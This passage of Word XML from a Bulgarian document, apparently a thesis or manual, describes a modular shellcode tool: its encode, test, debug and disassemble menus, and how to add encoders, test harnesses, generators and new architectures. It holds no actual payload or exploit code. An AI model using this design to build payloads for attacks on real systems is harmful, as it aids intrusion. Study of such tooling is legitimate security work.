        <w:t>“exit” - програмата излиза</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="001E0963" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Encode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Клон за кодиране на шелкод. Първо трябва да се избере архитектура, amd64 по подразбиране, ако вече не е избрана. Следва избор от 2 нови действия:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>“use an encoder” - избор на 1 от поддържаните енкодери. Ако се нуждае от параметри, ще се изведе запитване за неговата стойност, обикновено с такава по подразбиране. След това пита дали да продължи и излиза, ако се избере не (n). Иначе пита за път, където да бъде запазена изходната програма и извлича байтовете на шелкода. Връща се в началото на encode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>“preview encoder” - показва кода на избрания енкодер</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="001E0963" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Клон за кодиране на шелкод. Първо трябва да се избере архитектура, amd64 по подразбиране, ако вече не е избрана. Следва избор от 2 нови действия:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>“use a test” - избор на 1 от поддържаните тестове. Ако се нуждае от параметри, ще се изведе запитване за неговата стойност, обикновено с такава по подразбиране. След това пита дали да продължи и излиза, ако се избере не (n). Иначе пита за път, където да бъде запазена изходната програма и извлича байтовете на шелкода. След това имаме избор между изход и връщане в началото на test.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>“preview test” - показва кода на избрания тест</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="001E0963" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Debug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Клон с допълнителни инструменти, удобни за разработка на шелкод. Има следните инструменти, всеки от които пита за вход и дава преработения изход:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>“two's complement” - смята “two’s complement” на шестнайсетично число - полезно за грешки на системни функции</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>“htons” - host to network short преобразувание</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>“null byte check” - проверява шелкод за нулеви байтове</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="001E0963" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Disassemble</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Клон за деасемблиране на шелкод. Първо трябва да се избере архитектура, amd64 по подразбиране. Очаква въвеждане на шестнадесетичен шелкод и принтира деасемблирания резултат.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="001E0963" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ръководство за разширение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="001E0963" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Добавяне на нови модули</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Следните методи могат да бъдат предефинирани за всички видове освен Generator:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Staticmethod get_data() - връща символен низ с код за променливи</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Staticmethod get_code() - връща символен низ с код за изпълнение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Staticmethod param_template() - връща речник от имената на параметрите и стойности по подразбиране (None, ако трябва да бъде подадена).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Classmethod inspect(cls) - специално поведение при преглеждане на кода</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>build_code() / build_data() - специално поведение за форматиране на променливи/код</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00567E8F" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>validate_[param_name](value) - връща True/False, в зависимост дали param_name е валиден.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Asm_to_str.py улеснява попълването на полетата за </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>асемблер</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="001E0963" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Файлът, който дефинира енкодера, трябва да се намира в папката за избраната архитектура с име “mod_[name].py” и да дефинира клас Module, който наследява от ArchModule или в случай, че няма - BaseModule. Текстовите методи трябва да връщат валиден </w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>асемблер</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Следните допълнителни методи могат да бъдат предефинирани:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00CF6AEC" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>__repr__() - връща кратко описание на модула и параметрите му</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="001E0963" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>encode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Файлът, който дефинира енкодера, трябва да се намира в папката за избраната архитектура с име “enc_[name].py” и да дефинира клас Encoder, който наследява от ArchEncoder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Текстовите методи трябва да връщат валиден </w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>асемблер</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Следните допълнителни методи могат да бъдат предефинирани:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00567E8F" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>prepare_build() - подготвителни действия точно преди да започне форматиране на асемблера</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="001E0963" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Файлът, който дефинира теста, трябва да се намира в папката “modules” с име “test_[name].py” и да дефинира клас Test, който наследява от BaseTest. Трябва да бъдат посочени съвместимите архитектури. Текстовите методи трябва да връщат валиден C код.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="001E0963" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>generator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Файлът, който дефинира генератора, трябва да се намира в папката за избраната архитектура с име Generator.py и да дефинира клас Generator, който наследява от BaseGenerator.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Следните допълнителни методи могат да бъдат предефинирани:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00CF6AEC" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">build() - трябва итерира през всеки модул, като взима стойностите от get_data() и get_code() и ги комбинира по начин, правилен за архитектурата. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="001E0963" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E0963">
        <w:rPr>
          <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Добавяне на нова архитектура</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Въпреки че реализацията не е пълна, когато бъде завършена, процесът ще е както следва:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00567E8F" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00567E8F">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>Добавяне в BuildBranch на име на gcc, ld, objdump и objcopy, както и комплект</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00567E8F">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>от име на архитектурата за инструмента, име на архитектурата за компилатора и име на ELF формата за избраната архитектура.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Създаване на папка в директория tool_parts/modules с име “arch_” + избраното име на архитектурата за инструмента. В новата папка:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Създаване на Generator клас</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Създаване на клас ArchEncoder за целевата архитектура</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Създаване на клас ArchModule за целевата архитектура</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00112660">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Fakeheading"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:bookmarkStart w:id="229" w:name="_Toc3540817"/>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t>Приложение 2 - Справочник на използвани инструкции</w:t>
      </w:r>
      <w:bookmarkEnd w:id="229"/>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00B8642F">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Наставки след инструкции, които определят размера на действието</w:t>
      </w:r>
      <w:r w:rsidR="004E4FA6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="004E4FA6">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>в байтове</w:t>
      </w:r>
      <w:r w:rsidR="004E4FA6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00B8642F">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>b - byte - 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00B8642F">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>w - word - 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00B8642F">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>d - double - 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00B8642F">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>q - quad - 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="00112660" w:rsidRDefault="003A6EB4" w:rsidP="00112660">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A6EB4" w:rsidRPr="005E60F7" w:rsidRDefault="003A6EB4" w:rsidP="005E60F7">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="900"/>
